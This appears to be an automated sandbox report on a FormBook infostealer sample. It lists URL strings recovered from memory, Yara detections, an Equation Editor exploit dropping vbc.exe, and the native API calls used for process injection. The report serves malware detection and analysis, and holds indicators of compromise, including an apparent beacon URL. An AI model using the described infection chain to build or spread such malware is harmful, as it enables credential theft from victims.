Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: explorer.exe, 00000009.00000000.2160663488.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000009.00000000.2170312578.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://plus.google.com/
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.casar.com/assunto/organizacao/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/casarpontocom

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 8_2_004181B0 NtCreateFile, 8_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418260 NtReadFile, 8_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 8_2_004182E0 NtClose, 8_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418390 NtAllocateVirtualMemory, 8_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 8_2_004182AC NtReadFile, 8_2_004182AC
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041838B NtAllocateVirtualMemory, 8_2_0041838B
Source: C:\Users\Public\vbc.exe Code function: 8_2_009300C4 NtCreateFile,LdrInitializeThunk, 8_2_009300C4
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_00930048
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930078 NtResumeThread,LdrInitializeThunk, 8_2_00930078
Source: C:\Users\Public\vbc.exe Code function: 8_2_009307AC NtCreateMutant,LdrInitializeThunk, 8_2_009307AC
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F9F0 NtClose,LdrInitializeThunk, 8_2_0092F9F0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F900 NtReadFile,LdrInitializeThunk, 8_2_0092F900
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_0092FAD0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0092FAE8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0092FBB8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0092FB68
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_0092FC90
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0092FC60
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0092FD8C
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0092FDC0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_0092FEA0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0092FED0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0092FFB4
Source: C:\Users\Public\vbc.exe Code function: 8_2_009310D0 NtOpenProcessToken, 8_2_009310D0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930060 NtQuerySection, 8_2_00930060
Source: C:\Users\Public\vbc.exe Code function: 8_2_009301D4 NtSetValueKey, 8_2_009301D4
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093010C NtOpenDirectoryObject, 8_2_0093010C
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931148 NtOpenThread, 8_2_00931148
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F8CC NtWaitForSingleObject, 8_2_0092F8CC
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931930 NtSetContextThread, 8_2_00931930
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F938 NtWriteFile, 8_2_0092F938
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAB8 NtQueryValueKey, 8_2_0092FAB8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FA20 NtQueryInformationFile, 8_2_0092FA20
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FA50 NtEnumerateValueKey, 8_2_0092FA50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FBE8 NtQueryVirtualMemory, 8_2_0092FBE8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FB50 NtCreateKey, 8_2_0092FB50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC30 NtOpenProcess, 8_2_0092FC30
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930C40 NtGetContextThread, 8_2_00930C40
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC48 NtSetInformationFile, 8_2_0092FC48
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931D80 NtSuspendThread, 8_2_00931D80
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FD5C NtEnumerateKey, 8_2_0092FD5C
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FE24 NtWriteVirtualMemory, 8_2_0092FE24
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FFFC NtCreateProcessEx, 8_2_0092FFFC
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FF34 NtQueueApcThread, 8_2_0092FF34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A200C4 NtCreateFile,LdrInitializeThunk, 11_2_02A200C4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A207AC NtCreateMutant,LdrInitializeThunk, 11_2_02A207AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FAB8 NtQueryValueKey,LdrInitializeThunk, 11_2_02A1FAB8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FAE8 NtQueryInformationProcess,LdrInitializeThunk, 11_2_02A1FAE8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 11_2_02A1FAD0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FBB8 NtQueryInformationToken,LdrInitializeThunk, 11_2_02A1FBB8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FB68 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_02A1FB68
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FB50 NtCreateKey,LdrInitializeThunk, 11_2_02A1FB50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1F9F0 NtClose,LdrInitializeThunk, 11_2_02A1F9F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1F900 NtReadFile,LdrInitializeThunk, 11_2_02A1F900
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_02A1FED0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FFB4 NtCreateSection,LdrInitializeThunk, 11_2_02A1FFB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FC60 NtMapViewOfSection,LdrInitializeThunk, 11_2_02A1FC60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FD8C NtDelayExecution,LdrInitializeThunk, 11_2_02A1FD8C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FDC0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_02A1FDC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A210D0 NtOpenProcessToken, 11_2_02A210D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A20060 NtQuerySection, 11_2_02A20060
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A20078 NtResumeThread, 11_2_02A20078
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A20048 NtProtectVirtualMemory, 11_2_02A20048
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A201D4 NtSetValueKey, 11_2_02A201D4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A2010C NtOpenDirectoryObject, 11_2_02A2010C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A21148 NtOpenThread, 11_2_02A21148
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FA20 NtQueryInformationFile, 11_2_02A1FA20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FA50 NtEnumerateValueKey, 11_2_02A1FA50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FBE8 NtQueryVirtualMemory, 11_2_02A1FBE8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1F8CC NtWaitForSingleObject, 11_2_02A1F8CC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A21930 NtSetContextThread, 11_2_02A21930
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1F938 NtWriteFile, 11_2_02A1F938
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FEA0 NtReadVirtualMemory, 11_2_02A1FEA0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FE24 NtWriteVirtualMemory, 11_2_02A1FE24
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FFFC NtCreateProcessEx, 11_2_02A1FFFC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FF34 NtQueueApcThread, 11_2_02A1FF34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FC90 NtUnmapViewOfSection, 11_2_02A1FC90
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FC30 NtOpenProcess, 11_2_02A1FC30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A20C40 NtGetContextThread, 11_2_02A20C40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FC48 NtSetInformationFile, 11_2_02A1FC48
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A21D80 NtSuspendThread, 11_2_02A21D80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A1FD5C NtEnumerateKey, 11_2_02A1FD5C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000981B0 NtCreateFile, 11_2_000981B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00098260 NtReadFile, 11_2_00098260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000982E0 NtClose, 11_2_000982E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00098390 NtAllocateVirtualMemory, 11_2_00098390
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000982AC NtReadFile, 11_2_000982AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009838B NtAllocateVirtualMemory, 11_2_0009838B
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00375078 4_2_00375078
Source: C:\Users\Public\vbc.exe Code function: 4_2_003710EB 4_2_003710EB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00377108 4_2_00377108
Source: C:\Users\Public\vbc.exe Code function: 4_2_003761F0 4_2_003761F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_003722A0 4_2_003722A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00370308 4_2_00370308
Source: C:\Users\Public\vbc.exe Code function: 4_2_00372740 4_2_00372740
Source: C:\Users\Public\vbc.exe Code function: 4_2_00375808 4_2_00375808
Source: C:\Users\Public\vbc.exe Code function: 4_2_00379858 4_2_00379858
